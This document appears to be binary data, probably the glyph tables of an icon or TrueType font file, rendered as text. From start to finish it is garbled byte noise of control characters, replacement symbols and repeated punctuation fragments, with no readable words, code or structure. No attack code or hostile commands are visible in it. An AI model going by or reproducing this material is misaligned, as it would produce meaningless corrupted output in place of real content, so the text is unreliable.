'T%%K�S;'T&%Kc))0�o;
&R���;do;'R���;e����*69@NZgu���������*%/676?6'&#''"'&?6/&7>'%5"7276'2&'7'7167'61/&'&'2&'&/%036764'&'"1&7'&547676'&'&'&'5&7">%"7>'&0/&6?2'676&'&03761#"&7'767676'&'&'&763'&7&"7676'&/&54>1�{��5:��8		D.
5

a+��v��
!%���
.�&-#		*
	
"

&
(	x

	
*
�
$

	��l��%�f


&
��K|
x-_~��af���"%	��%	#T>$��
	
"Kd



H
	
2
!
A

!	
	
H
	
�i�R8H]��!"3!2>54.'&5676'&/.5476762%#";26=4&#54&+";26=4&7#"'.+";26=27676=4&3#";26=4&+5326=4&+5326=4&��8^77^8N8^77^(2�04@oR.21SV�US12�>@5J�E
F	�JJ6666R7^8��8^77^8N8^7��.`

3Na6PDB'(('BDPT����y��S\�U_������(J}��#&5&?6'&'&'&'&'&'&767676&'.6=>=417>.'&#"&>327654'&"+'&67632363>4'&'&7>54'&&76'54'&>54'4"�lT]D4'0DbQr
"E6=0JICUO�%'	-

L,+
	
	



	,.�I
-&

�.�"%L9��<UJ=>
	
#)AVTTWC>��/5	4gQ!	�
IO

	

	*-&&
(C8
j52���7!"3!2654&#3'#"&462#54'&#"#56'3632g�&&�&&�ȃ�B ()B((��"	��)MD(+%�%%�%�#�6';'';'�?�*
ݸ�8A+/W����&Z!33!4&'&#!"&'&54&+5!2'&'&354623546#!".5#327>=4.���cK:==PBG�'��.c "&1�4m#%�";%B%B#&��"A"#!+A!�>�),�B�(+�x!7*-/)p?133+/�����/#g��A;�+�����)e676767.54>2&'&'&/&'&/&'&%376767676?67676'&'&'>54."&+%ALA%)"G4O)	�B8h		#)5w6*$
	<
@;N$(8_r_8)F5(7 %@%%@%8$;Z|	
�4a�					B4IP<7S/7^77^7/T��^1;SXe~0'%&5&7>54'&5"&5&767>'&676%'"'&767>'&>7"&'2#"'%&'4'&>=��
�$*.\"U)�+h)2��-*c*��+-\"U*(-�B%X!$K;6��),K6	
��
��-JUA|A#" $+&-2*"#
!�����r#$B{.1*"$
!'.)�)w./$'(,$�H�Y��J���� LMA&��e	7%%7'�qq_����54x������V7����\�� �N�Sik���#H7>'.&7>'4.&.&'&'&'&'&767676<'2
`-(
-
 

�~5j0rM	


<STa:}=�}�
7)%'%?	+(	4�
N7e.U=@	
T��?fn������!"3!2654&!!23676'&/7>??'.'#"'&'.%33'&'463676?6'&/&#&7767667../;265<'4.7234#'76.'&'.7374&'&'&723"/3757'&&57'&74.'&6?67654/&"'&51.'&���

+
��U�"
	!B
	
	Z
�F
<	%3]%"		-	
	4F)		
p		����c�(%0&�
.)t
	A*,
e1 n


)
! ^"M
Y$7!a+"%C	
)
";0		
	
		%��5!33333����x�x���k��?��?���U%73264&"573264&"#'654&"327'654&"327'654&"3273573264&"h$$4$Li$$4$L=M$4$%
lM$4##kM$3%%k<i$$4$M�K	$4$$7�M	$4$$	7�8##3%N�7$$4$N�8$$3%M�=L
%3$$7���T57676?33'.'%7;26574&+"&'&'&'&'&+";2654'&'5&>_i�+) tYV&(53�Y][S�VU�RF
$	_H	I)%�epMKknt]MJ`g�V���	�	$M�
.8!B8��]	`070���42>4."2"&4667>."'&2?264'�=h==hzh==h='77N67�G=6E�E6
?D'6||7'P=hzh==hzh=?7M77M7�	'5.
++
.5'~7(||'6��^%"264&!"264&4'&/&/&'#/&/&'&/&'&/;?6?676767&%%4$$%%4$$M	0+DAMI28.("
 -$VQ8$&
	H
TB
	�$4$%3$$4$%3$=		

.


L
I8��m=g%"'&'&476762%6767676765&'&'&/&'&'&&'&747676767676763#"�('CE�EC')('CE�DCO��
%,4;

$	""%-�	
$  �PEC'))'CE�EC'))'��	
	'.6&"+!




% ��I",&#!2#!5"'.'&=3264#32�R���0/�0~����}}V0..0�F!#<�&<"##"<�����64�36��6=N&#"&#5##!273%3#3"/&/.54767623#654'3&#"322654�I_\Kuf5U�U���%%$�XN�E�E(&NB�@NNדNX��D`
Jmg0055��::
�$�]�V55']8oM++
N�M
V{[;DiN

a���$%!#&'&#"773654&A<2�rPK@gX\HQ0��n�O0��^�q�h�(,�9�|99G��y�Bm��IGr���GP"6?6&'&5467632#".76767654'&#"?6?327>54&'&	qWL,(3	!=7:JB0.1($%/(!,AD#
F(O?<EPFK2,KFKD26
(

(;@o "W8Iz#%-0'!"<%
��IpZH�%.,�bK�&*��3{���%/&?676'.'&#'&'&##5&'&##'.#'&'&'&'&7&/&7>76'&7676737676767676767676767677676767>7&'&'&/2�0
"(�


	"�!+$
n:|	
	
		
=� 			
7
	

!`)
"*"% '# (/3
>�	�i

��
�
	
	W
	.			



#
���"936767676'&$7676767'&'&'&7>7676�x,	NJ��oaInSOTo'%#7>#!		+.&.X"C;3)�PL)$Hn�X�#%	
I&@#+�
*%0,O>9y���|�����%9AGMensy��&'6&'&'&'&'&'&'.'#">?677676?672767676'&'1&/6?67327676676'&'&6'62'&'&6676#>7'&'&'&'.5&7'&767>7&#&76?67637%3'&'67677#&'&'&'&/&5&7677>/4/767.'&76'.7&">4634?&"&4323&'6'&765'67&&746'>76.26&�	
}b60<"
!$/2<X#&/3+0
	��			
�

),4F�.

($14""
% j.
	Nwq	H&_93)*%"%!'':48)+#
		" XdUE;N

&
uY
		
+:',	
MV
")21	
FD
=%		
	2	

%?�
#"D	:>=�
	
	�� 
	6!`
$h,+
"),#"'
4*
/Y!

			
|	

	" ���Hn���6767>7625.5462654'&'&"'&'#&'&/&'&7&'&'&'&/7676767675%&'&'&54767624&"2674&"26^
"c@C�CAc,!
(-,KL�MK+-)+�#;1A4;+*!OJ@:/**/;?KO!*+;4A2;�Q+O?Q('BD�DB'(�RM**�,
@bc@��)
	
FMTGF)**)FGTQE		
��+!t!!t!�61-b4&55NCB&'''AC 
^)����?Y���!##"&'1&5467363210&"#"/.#"32?6?6?>4'&%013276=4&#"11%11#"'9&'&547&'&514>;2676767>736326756321+.57&#"1676323'1;2651654&#"#&#"1"64'&/&'&#"32767>71674'9."676�	"		#=D6,	>TH?
��	!	N$94?=DcZm1'
P�%*.!%") 
	vV
#
#���
#�3f46HEf3
#\t
{R+9  2=
�$	
*
K	
� "B0!$.Q29	(
/	B'
	
'#
1	��

	1�.+F!!F*/$ 	3
=;"�
-.	���
>%.'654&'27&�g�1/gu��1�h�uh��7oPb�aO�x^[l�z:�^x���:|�j��FSR�2662���
*234'.'&#7234'.'&#".4>2@R�s>�-,�gku��~�67�EB񜢱�6@55@6C>u�Rukh�,-�85�������BE�
 66@55��z$y��&'&&'&&67'6676&/&#'#5#&/&'&'7>56/&/&'&'.767>73632745&'4.+/&/%z,:)N

C�'�V5JEE"]

 		
		


&5"		�F4&�3H0A	��])U">	
 r7)8��



%L
	

(�*,23��;���1.6?>&'671>&'%.776%>&N=$�""��33	Dmx2""�"mw3""|=#�""723G4=�HP"�"mwf3	"HP"33	"HP"U3>�HP"�"mx���!g654'&'&#"&"32732>#"'.5463232654&'&/.4>32#"'&'&'&#"�76\_n!=�pB$76\_n!;FCpB�bDR4%0

)$1<!':R.1_?3I1	
/*3	6'!n_\67%BqCF:#n_\67$Bq�<&(E 

 * 	#<WA$'*(	#


4'.���`e'."'7676/.#"'&'&#"'.";6?32?367>'4/7727>'5'?67>'67�'V8S	(U	�)
S&S7R'
Q(	�)		[	�8Ac7F�
T
7X7T
6W
6�
7U6V8W
6W
"D�!���V3%4."2>����}%@J@&%@L?%Qe���%@%%@K?%%?���9CL264&""!&326=233>76'6?6767676?676&/!264&"( V:;U>�
��Mg	R? 72@Q	
[����� T<;U?_;V=;X
��Y
M,DHD_+��)\CGG
	
%	��z;V=<W���0C"&462%"264&#"'&'&767676?!!32767676�2E22F1("22E22�#,7CO\i�WN$ (	�


X�i
%I7HbUG:.#�''6''''6''6'��9FDUBO+2:4\Se`T		&.8<8>0>8/SAQ<���-�4'&'&'&'&#01!";2727676765'#9"/&#"+"'&/&'&#"#".'./&6767>756&'&/&'&567632327'&76767676;236762�
#-6�T! (#	
!(.��d3%-
m(	

	/")





")
'$

(4G!!	$,#0�Q!#%	
	"(9#)/
	







	/	
-(""(-
	,		�Q&0J"26=4&">=4&7"2654&7&254&#"&'&'&#"3264
�	Q�
<�(9!#44@
b8R�
�
�
Fwv
j��
�i�"�(
>15�ERp���#6L"276764'&'&'&.6767'..67>'&'&.67676�wfc9<<9cf�fc:<<:cfR
����
/:��EO��CCbY^\D	OfjdmN"<9cf�fc:<<:cf�fc9<��
_49jn$&+)p( ."	��U!!3!7326=!!%4&#!"!��>B.-� .B�>�>�B.�-C���(&1C��C1&t��0DD0&��K7%77777!#!!!6O��3�--z9�9�XG�Eo�[��5CQC�=�=64�4f'��'��DE{����c�E�`.?L_"&462#"&/#".4>326?54>2%.#"327'.>%2>4."4&#"#/326h/D//D/!b#;#.F
�&55(>	�%4#'COD'7��
%".."
&2�4=44>43#124.#3�"//D./�S#;#9,R4>42&O%j(C''C(/K@.B/

1.144=33��$2
2-"3�� 375.""&=#2>7462"&='2>="<Y5YhX5&�4ZjY5'�&Y<6YjZ5�>4V32V4��xy5Z54X5�}{z5Y45Z5y��z,@6&*.7>3!6&'&/%&'&'#267676%#&367%>5�%I'!((��

��v
���+NJQ( 	
!m%$�	�	�� 	D
	8/'��O�"����)D6;6767767'!".5&75&>6767676'&'.�8)L	$!?8@#gajR7-"9��+K-%C

#/wy4.%(b3846�_UMKG2E=&-5�1Y/L+kՠ)L5i*(&$*,1,)(���1"276764'&'&/5?4/&'&67%76�wfc9<<9cf�fc:<<:cf
pD���n			�		<:cf�fc:<<:cf�fc:<�zU6�	�%	��zL#767676/'&'&76767]7!$
P:A*C�ɯ^#,*
$).4?JL
LHSW���COj:`AU<<29���/!"3!2656&+"&546;2+"&546;2T�@#22#�#23�D��}��3#�@#22#�#3�]��-��	$%.'4=35#5#3327675#"@��}	,&Dw
@/*4/)>AE$H
#��FU |��8$!6		�+���	33737#5#!3#73#�9�rr��L��r�s�^LL�LL���ss���rr'��������7>7.#"&'&'&'#"'#"'#32767676=6�/9)
3?E&1R0na_D+%,%Q?\:.s>
}�wd\D?#!5n4  1R121S+]OAb
6E%(P.+MH\Y[&���267676'&'&'&#";276767'.'&'&.').%8!? ;'#h��@])E#)=148?7"3>24(4/h$&<4OQGO'"C9]T��*M�owFO5+H731-�Y`BJ����GKOcw��&'&32767676?6767676?6'&'&'&'&'&'&'3#'3#+.'=>;27+.'=>;2'!'&'&'3337#53�C@:71.)% 	* !"$ "	;2*!


�22m22$	0�%
0��A�@�\\�	
	(!) #B>52'#		
2?6?24&$)&#
QJJJ�B0505l�����*���@\w�&'.'&!7>?&>2&'&'54'&'.'.'..'&'&7>"'.54'&.'&'.'.'&676&'&'&'.7>76767637>76�?&
��)=.	h	.=�8-*#
F?(
	u'T-

	
�!


�|D



:
	
#&
)/�!+8",��
.=

=.
;,
#5K	[5t		A%.'"h�
)
P�[Z
	J


&
	&����(12>4.#"#.#";'7!'"&462%462"&�:a99a:4Z<;Z4:a98_9��dh�##2""X#2""2#(8`ra8/R22R/8aq`9HA��Hb7�"2""2";""2""����>7676676767676'&'&6"'&'&'&'&'&?#
 

"(L5B9G/774w+/$'A#

	,'2(- .
D)g_'B 	2.;CTTe`N0+
,04D(?#IU.#^;K": 	!)"��tS%'&'&'&'&'&'4'367'&'&7676#'&'&76'&'.7s$M�"
D7>)�+-BX>f& D5I.%=	
)2BH`��|
	Bjv�lx$mZgW[P[y7wb[W)!"L#/- 90!2:S'*�i%#334&"26�ع����5L55L5S��]\%55J55	����lz���2/&'&''&/&54767#'&'/&'&'&7'&76?676?6?6767'&/&/&'&'&/&'&?6767676?67676732&'&#"2767654'&%'&'.7'7'7'7'7??????6767675.'76?676?672767'&/&'&'54676?6?676?67#"'&/&'&/&76?67676?67676'&'&?63#/&'&?676767?6327&'&/&'&76236767'&'5676767?67676'7676.76?674'*&53>5'&'7627&6?654'&'7675&'7>1	
Y



)-	
	%,7

�:HJPwfc9<<9cf�fc:<  ��
-3"0WZ	 &


#
	

V$("&679:$
.	
		
%-9uu^`
	�

(*:5
	
!
#$3,',
!*

#	$J
�
�	
+4")#2 


;
	








	
	
3<:cf�fc:<<:cfwVOL[HC
	
������}�~����������
6?0!
9

	
		
	
"1




					


SS	


��


	
	
	�
		
	,

�	
*	�X{%37>?67>3?67676/&/&'&476?6'&'&+"'&'&75476'.'&'&#&;'&'&/./�4	
	!

}	

=O�C


)	%
	}
!")&#*!$g
		&

)9	"&i"(q$"

)#!@&	
&.-?2?($
����&/8]fo767676&'&'&7676#&#&'&'&6.676.6/&'.'&'&767>">4&4&26�
^lAYUTX>5	�Yc"	$%�$$�$$�<39)!"'�s77)_"
��
)	Ea�^9<3D	V^	
�#$/2)fb$
				
&X*?<=>+w#����Jbz���.'&?27676676'&6&'&6767>76'&'&'&'&'&'&767>76>'.#3267676'&'&.676746&�F8;F
*O
�0:)+;4-/9)(=F]V�GI&
#L(�S617!
P#I1@<B',
�A-��*H&"X%&
$(P
�@f	
,&(1	$K &C!09+>?H5&#(%'5+'

�.5&,9B.#(9*(6!
	a0$(+'#&-&�""P���Q"73276764'&'&'&'&/&5476?>22676?6�tc`9:M�_otc`9::9`c] 7_P)			
*+
.:9`dt;p1�L5:9`c�ca9:��
'r92!2
	%

���37'#Y�0����r�r�XX��	�������.;&#"6676?654&%'&'"'7626767"327656&}
 ��!�Ie%")J�UF\8� 
�0�W�o[�P�^
=��x�Bq��+��U�x�$
�M-��W7Tm�%32?64'&/&'3?67676/&'.'676?'&'&'&'"4'&/&?676&67657'&'&Go

X�	
	�	cy^
�	
�
 	�

�6���	�~
DX=

u�	A
	(
		@
	
�u

]	�0	@�
	.		���3t"&'&'&'&'&"7676?67676'."54'&"367=&767>'&'&'&'&'6767676'.�
		4
"N

@
�
(!


	0	 $$	>	
	

		'$�	 
)6&2%(+9�; ;4!*&*#(	t

��(&H

4	
0


	#��a0L_o������357676&+"/.#276?35#'&'4=#>767654'.'.762#"&'&54&2?6'.&'.'&767>7>76%###53#5.'&=36?53&/#37>2"'&'.'&7>36#>=3'54&M1


K
	..	/�%%	'
f			$E�^[XN,


#">9��.' ��13�z.	
.
.�		
,,�$	
X//
R��^[ #';��	
��	EfoK

	-+

	
W�

E&
+D�M�D)
J57(',�<'
541���..�y
	
>ic?��;			Fi
	

)p
(+
!$	

B!
���9q�������7!!/&'&/&'&'&?67676?67676'&'&/&'&'5476?6363276?63267676'&/&'&76'67672"'&754'&/&'&/&/&/&'466767676?676732/&'&76%7!%���J	


	 =


	

	�	

+


	��

)(

 
	


�$1��r��1���
 %


$%
	�
	
	

!
	
	



	
�"&!) 
	��	
			





�2R�m��2V��e�R"*06?/6767'&'&'7'&'&'%'&''&'&'&/@�Pr@sM���ARP	�HI���=��!22&M9��$�_I�=1��2:�
:��}�0�< SP9 7
�4��k�$�o�$=����BUF��S=�

�j�RBd�%'7&''7&''7&''7&''7&'7777767>767&'7777&'.'&''7&''7&''7&''7&''7&'&'�@"0 -:-.&@0A&VRomVMQ~I#&@%. 2;3,(F/F"ZSokVMQ~&#"��;NH;/<#$(;* &@%&�ZV^k;
LE607)#;%"#?%%�ZV^�]O!Q!%@0@.''=%("B
#&�UlhX!Z&E0E%-)=&,A$%~QMVB $>!" :0;"G!JHE^VZ�&$	�NB
!#>$606#?!A<8^VZ�&$�j5RFJN264&"2'5&'&'&/#'&"277265'732657>%'5;p#11F22��"� �

'&(&&M'B/����2F22F2� 

� �
	.����P)/ZC	����FUfz��������"5H[p���������+"'&/&'"#&'&'&#&?67674'&'&'&'&'&+5&'&?6773676&'&'&23?6?'&'&+"75674+"+027676'4#276?&'&75676'&'%0#7676'&'257676&+%"#"61#7676'&'276?0'&'&'4'&'&1767673076&#'&'&2?%3676/&"%7676'&/&%7676'&'7676'&'4'#7676/03676/&'%7676'&'&251676'&'&#167674+"67#"&'&"36454?4/&67'&45&'5'4�@2(4
&+"(3$+	2(;C�04()4P000(3�*+
4%1"�
#�#":"+.*"%%���Oj56
%�f1!($�(+�	&/�B:*$�

��
Z��'�#
���M�Q
�3!|	 	�t&�		�##4@TX*!+#. ! 	
	
	
$'$,`WE>I��"V
>2+;DA;44�G~	&-"%#.) #%/@9962;)+!'��4
B,	�)1%,
	")%z % %$ �
"+$#
��
"�(���j�R
+9GTan	6'476767'7&'&'67676767&'&'6767%%67676766764767676�@OLR'�*5*43?:$&=DHBOMR&�*5+33=C&&>��b[]G��#��AD62/'0�B?10'0&B ��bY\F#I��8B=55,6.�+
RIL;ei7'$55,7.�+
RIL;����B=&'I�*1(02��M_\a		'�Na^�=B'(I�*2(1�j�S!9CN" 7676'&'&".4>2'67654'&"2654&'462&"&>7�tqCDDCqttqCDDCqt�BoAAo�pAApU6 9]<!}4
<6#""RDCqt��tqCDDCqttqCD�Ao�pAAp�oA�
.$%
,#01)*R
)�#/"
2 ���v.=O]hw������������(1;GP[&'&'&'.?64/&'&'&767676#"'&'&'"#"'&'&'"#"'&'&"'"76'&'&&'#"&6/"&'&'376"767676767676743?6764'&'&"7667>36765463636?43727323367>27627654767>76?6'&%64/.>'&/&'26'&'&/.654'&'.76764/.7&/&6776/&.'26'4&"&226?4&'367&'&'&/&67&/&'4&"&26&'"'&6&32654#37'.'&'&"36'&'"'&32;654"'#&7&/&26'4&'&326?&'#&&6'&'4+"726?&/&'25.'"76&'.�#4?7N'(&

,?AO'		
"	 a�	
t=ZF|_0DU
3.LSC<%<%


'		
k-
	


$	�Z
M	
A	!
$4
$

=

]
	*�	�J+k��B\1	p{�j	A�'	*4$
"%.
=HG% 	7$q)|p
]

%	

 /,


	
	.%#
T	s	
HV(	E(		7;�-Z		(/
*+
	 
8	I		
�IN%!";737!73737326=4&%337337!7676'&/&'&'&'&/&'&'"'&/&!��^	

	4 &� 3   	

�34e?G7D>!0 #((23H@O>J/	
	1'3$'
	$��9%%%%%%%%%%9��__0/
#(2	<���\&'&'&/.7676&'&'&/.7676'&'&/"&7676'&/4#!"3!2=4;23!26576&'&'&�/'
	0
0	
;
H��!.o�
#."4#]
	
!$(4K"��	�y"$Mj 
		���
(5E_|����'&;67676'.'27676?676&'&'#";26/.'&;67676'.'27676?676&'&'#";26/..'&;6767627676?676&'&'#";26/.�CD
QC

" 		DPQ!


	d��dCDOB

" 		COQ!	


	d���CDOB

" 		C�!	


	d����� 	��
� 54  	
5	
v�� 	��
�
	 5  	
5	
�

�� 	��
	 5  	
5	
�j�S&/" 7676'&'&"&4627462"&"&462�tqCDDCqttqCDDCqt��,,>,,,4I33I4�&55L44RDCqt��tqCDDCqttqCD�1->,,?,�%33I44��5J54K5���g�TJ[�76?6?64'&'&'&76762?6'&7676&'&'&676762?64'&'&'&&'&'&4?62'&'&'&'&4?62326�)�k'
):?1@�dX	$S
E<��x	&C$$A>�<i,3#'BOYBJ3 %3H�BBN  m(��K>$(#+WbXdD7��w	 V:
$37iCFi&��%,!Oe`lnD6
9s0;N�i�Z�Mn%'&'.&?6'&/&/&'&'&"'&'&'&/.6'&/.676'5&6767>76762766767>7676&'&67656/&7676?>76?6763'&'&&'.'.767676&'&'.'&/&'2767676767647667672?>76'76&'&'&'&/&6&'.7654&+"67676BG:.	
"-

	

			
	

			- !$)
		c





		

 !D
:	�		��	
	)
<	
	
+
	��	U

	
	�.*�`

�	k1%			


	




		
		)A 5
5
		
!



,
G

L-	�%5

		
O		
+
	

	

,	
		
�j�VAc462"&27676765#&326?6?367;>'.%727676?'76?6.'.32b1E11E1$/'5&*, 'U
	Ded
VT
Tn.
).1*
��q1*( u6 1�}C!S�#01D11�*!.Na��WF*
W.2
���6'��e$�$3%��K���� �

	���l�M(7DWg~�264&"74563'&/463&/767'6762/0603#'67&'65>2'&/6?637!"3!654&&'&'&'!#)99R::e

	

	:	
#,	��O

�8e_z'pTZ/+|:R9:Q:�	
F		�
,"N.
	�6961f96	�+��L	26`UU��8!!!5%3#%>4&%3#.46753!5#35!3#!�"�\���+  +�__��!--�N__x.??./AA/�����������f��"��!2�2Dʽ�1D1�E^EsrE`Ereee��e������:u����%&754&'.>7>=&74&!"'"363232#&"#"3626"#&36226'&76&#*"&56'4637365&74&#454&#'&3626"732265&75&74&#4&65&7>4&'&�
/56.
��o8	

)
	K

��pp+78+
K%�n
	
F		
0$	K��	)*
*)	
	
(
)�9	))
+*()S>
	
D[D?U*

K%
	
��
	?=�
]]


HWH
	
]\	;:��
<;�
��	
1�1H	��
!BcC!
R

6@6

$E6C8
8W�j�S)8EUhz" 7676'&'&6?62"/&/76&/6?&'7#'&'5?"1&/&'7676?674/&'&/765�tqCDDCqttqCDDCqt�2a2%�b
�,	2k�	\F�J�+�	�+^4
(v
Cp"
g2	1RDCqt��tqCDDCqttqCD:B6'�U*cX|	�'Jn)v	�bb.���A! <Ki
	*�[e/��LV`%;2767676'&#&67'767'77'767&'7''''&'%6'&'&/6:
)6q[eP�	4y`dQ�)
	*V<1	z'��%={@		6;e		P	7;f;
<
<�E!��E��.=.$���&8Mav�2+"/&4?6%32+"&/&?6/&?6372#"/&?6372#"&'&?6372#&276764'&'&"32#'"&/&4?>��FD�FD�GE�FEGC�GC��GC�GC��GD�GD�t<9cf�fc:<<:cf�fc9<o�GE�FDPwvwvvvvv!uxux�uwuw�uxux
wfc:<<:cf�fc:<<:cf��wvwv�VR}�����&/"'6456=6&&'.6577673'&'&"65746'4#66/&'76&./&'&67>76&'&6?6?67>%#275364'#53654'."2>4&"'&4627"#"#"&=&#'"3272?275&##5&#'"36=4�%8	
	YRG	
.j�
��	%	�-X 0�

���-cc}	e
R:�
	)
?"0
;   #A**
$
	 

	
l$|
p
R���'>��


*
6=
-/O=<S����i��&&74756'&'&1'&'&76&'&/&'&&'&'&'&'&7237676'&67676767676'&'.'&>&#"3732726&'&#0&'&76=4'&&'&'&'&'&&'&/&'&'&&/&'&7;7676'&67676767676'&'&&#"72>'&#�
			


	"
"	"@	
�

E
G3
,HI +'

��		#			(

,


	(

3%	�d
	TA	
�

�B:0#
 /9#	

:EXB#&�
G3G1(v
c			
�!$$
	8*


K	
1@1 ,"

#&��.������U{���������&/9APgx��������AMV`ny��������"0I6&/676&&/&/&3'&'.>/6?6?3'&6/&'&'&67676*"&564&#!""&"&3!62>&&'62&/&'.7>7>'.67'/&'/&?6''&/0&'.676?6'3/3"'&''&'.?67>'3'&'.'&47676762'/&'27'#6767.'&67>+"&?67>'&76743&'+"&?6+"&767627.'&676?6"+"&?6767&'&?6762'+"&?6767'&4?67'"/&'&'&676?627>7&/&'&'&"'&/.'.&/.67&'&/."'&/&"'&'&4?6'&54&'.767'5776/&/.76?67676&67>2767>7&'&767>67>7627251676'&67>76236&67676762#"'&/&'6'.'.7>7%&>&63'#&"&463236'6'66+&/&6&7'4'&76&746732&76767&'5&7''#/&'&636'"#'&636&'&67676&/.>54.%4'.&;7>;232764/&''&?6?"#&75&74&";2654�[
44
6C	T+QB/W$	G
)��8*\�e
�		

	
		#	"
 !




UFdG	
WJ



		
N#
XA

uC!eA

^	>	



	
	_@

+	

	

	



			









		

*
			

	

	
	
	

	
��%65J65"
	
	
			

	_



�			
'$*	%(

			�
AG?.1
.	; G"Lg
<
	%		
�		�@�x	�
	

@.	V	
"
 !	







	�	,

&"	






	i
	

		


	
					

	

C


=


	
		(





	
	

	


	#
	

'

^4J64J6
,/	
M		 


	



"
$	(e		 ?	�i[R+7BLZfn}����������
+=Cp"3276764'&'&'&'&6'&'&76''&'&6'&46'676&67>''&'6&76&54776763"'&&6'&'&&'&67&7676''&&66#"&&'&27.>'"'&>'"'&6766&7>7''&767632''&47676.7567672''&767676'&'&'&763&4+&'&;26'456'&67676'&�bTR/10/QSadTR/11/QSy	 
#)	E
	%
[%	&	/				

L
	 


E$


	
		C&\&

-		

	
P$8
	
	
	
a				
	7�;B3
)

	"
$R1/PT�TR/10/RS�TQ/1~&
*V-
�	 	
/	!

w

`
	'��
	S	

x	
	
�(

�
�
� 	
3�%
%�#
%
��
	�.
	

f#
%�(

A
	


�			
 �p	+
#	
&�jS��37676?>"'&'&'&73+'&#.'&76'&'&76?6767>3>'&'&'&#""&'5>762?2'4&#.76767�!
9	


	
			-�

A*&
	< L
&%	6		
R!�\�1'	J)
�	*#u�=			3f	�
				��
74:=����M�����736?'&'&'.'&'&?366'&'&'!362'&>3727>7676?676'&/7>4.6767#+5.#&#263!2"2>4."&>%"2>4.&>1%*N
	
��'(:& &T5k1B!
	- 7	1!	
+=! .%G
	�35>3 4 ��5 4>43!
B$:v	

&!z{8#D5�
!]3	/((
C)j!
<P(
�5>44>4��4>44?4�������?a&'&'&'&&56'46?67&/&'#7376736767>&'.7676265<'&6�&G;I<P.!G- Ci	�j4+
1 74Dltf4r[I&��
/+,3%	;. Z��
	J"	
��
	(%	,$2$[�'##$��	".:GS_kw��73?#""2>4.267"&5"&526'267"&52672"&5"&52677"&'32677"&5267!32>?#&'&'173`!!'B''BNB&&BC	

	



)	

		

	



 		
	
	�6AoB:dD32�T:
4M��2��'ll'(&BNB''BNB&�	
	

		
	9	
3



	
G:a:-O1G�2.%��^�jX<>.&'&'&'&27>/&'&'&26=2656?32{(D0RD0�	0�b#8)
"
&	)>6$(!�.RE0QD�
	K�
("�'��uX	c������dq���.'&'&76&#"'&'&'&#767676?2?76767667676?5>7676'7>27&'&#&6?63237"6?"&462�]CIY+/UK?5,#
	:$		M>
?M%%<%
��(
!#	'"

n

�$$3#$�R{%)"#Q+E\8
$.!,E	


	
$:h9c�uD
S	&"k/:$3##3$	����%AUm�����%.'&'&/&/&'&/&+6'%>&/&?676767'"765?6.+&7>"&&#'&3236326=4.6'5436?#""3>7656754.'1&36'&'�]("'$8	"E��	-!8#/�8
+H
8'$





�h!4
	
	!d
	�
	r(;&,��

E

�		�F$7*)</a7%J�
L22N'
6
'28(	
$

�#Eh*M&��S
("�����#���D^~�������'&'&'.76&'&6?66?>'&/.66&/.6226&/.?676?66?67>76?>?>7>76"/&/&'&""&'.&676&/&6?67>6764'.'&6?6?>&/&#?>/&7>./&'26=6'46766=46.'&'&6?6'&/&?67>"'&"'&'&476766767>/&"#"'&7>762'6767"6&/&&'&/&66'#"'&6�2

		4		((%	$%!LM

		
	)#HM%I$S�	
	

.Y-
*;	/�&		,
�
'�	

�

 1=/"� ��M

��V74J$K
;J%a��		
�			
7	

�
24
	
$&#
"$-*&

		
	'%C
N)J(X�
	%4c1.7	,
d$		(	t

				�"#
;<E#
++
#I�_!��Q0

��[��6L'T		
�O%
f��}
��,.�����48<E!5!7676'&/&'&''7''7&''7'&'&'&'!&!276767>4&#5353%+5!���('23G?_Jn]pc&��		$�:%4
�U��?�!2c
$

C5OB	OF"($	<�~%4U�zz��2
�F���������&/&'&'&/&'&'&"&3"'&/'&'.56'56''&'&6767632?26&76?67676326776?767>54?27676&%667>676'&''&'2656&'&�/]J
'I	&	,VD)E" !# 
	CR)4	
">J9PK54

 *	Dl
/a'?5E*
�L	�	
%-3K:F=
K9
��AB	0%H
�

	
'O?
	$J9	"9

7D"<	����	,*-

	8\
*P!41�?
	���	
"	\A�	""	80e�

������BPj����&'&'&'&#"'&&'&'&76?767>567676&%"&'&76366767673>4&#67%&'&/&6&'&'&'&/#"36'&'6767636?>7&67%26?6'.&/.�M$  $'
DE
	�G8'FRAYN9%	
8��	�wQ�
40J,
�
�lh
	0
2f6D�!A*]d�\_^ 	/]F
�'=.;.?�>#	v;
B" �z
	
�	
"@0! 
Cl	
�]V
	,U-:r	PSNQ	
'O;�4&'' %4����@I".4>2&'&'6.2'&"3%&327767676767676'&�"9D9""9D9"�
Kz%"*
	� $��#�q���!	$9C9N)%G2EC"9""9D9""9�F��
q@7.$�#�
C�		"�4B\k%�h�RGT[lw}������������.77777?6'77767676/&'&'&'&75.#&/&2>4."'67'&&'77#'6767'57''3#3'"/327&/&'7>?767'4?4753'&?'&'7'6?62'&#'6/6?&'&'67676767>7'C ##�### 	i�UT))�
	



��u"��9`88`r_88_k]'	'9L4F#S#E=		"
#	$90)
�&;
'08'

�1A2F8�;'!-o!##�###!3%�	
))3081
��"���8_r`88`r_8�*z.�)JI%99�11@(	Q!*\')	,P",!
`E(

,"��	


= 5�j1R]#"'&#"#"'&'#"&=4>7676767676'&'&'&'&'&'&'&6767>7!�	
	
*) 0

'1
9>/B.!		")6!983(
	
E7M 0#
)F(3.T:?0- 	�j�T4@IS\��M&'67654/.?676'4'&5?7>"2>4.'4.67&>&%">&%67676'&'&"'&?67676?'&'.%67676'.67>'&'&'&'&/&'&767671676?7676'&/.76?6'&/&'&'&'&'&%767676'&'&/&'&76?676'&'&'&'.�%}	
>| 
,$/<�&97&++D6N76N8�(72&)83��'76N66C


''		��




	��


		


	
		;

	9|B	
Se

%#Y*-
#	$j{�(8L8+0,&64N76�3O63O77M55O6�	

	

�		

	
"
	
�

		


!

			-

�j=R%2?F35#7''#32>54&'373#53".4>2"2>4.#5573^�k��k�L_&$�K_(K�K?_�M>h>>h{i>=i>7]66]n]77]+**+��k��k܌ �UKA>KKKU��K�J�OO��=i|i=>i{i=�7]n]77]n]7���**+�i�SKWgw'&'&'&76?6?676'56'537676'&5'&6?27674'&%>'&!"3!26=4&#";26=4&D1=%I;1M	&	

=	&	"+%M9
��+08-!��Mhh	n

!G�B
/2l�P�"

 C�dT�F


M�+#50PR-D DD���@/^����2.'&43>76&'&'&'.7>727!274?67676.'&36#"'&'&676727!354767676&'&'&'"56767"'&'&'&>727>7>3#!"'&'&'&>76>747>7&'&'&6376#76'&'&'&'&"&56%'&'&5&'&"&56'463RK"0',]F

:"F4)*$I6	K4�Y7$+Y4	2!1Q..M'&,	\.F/123.#D/'@�
b	0#/1 "@,A"��
^0$/
+)$H5	
	'H�d(2�+%BC��4R
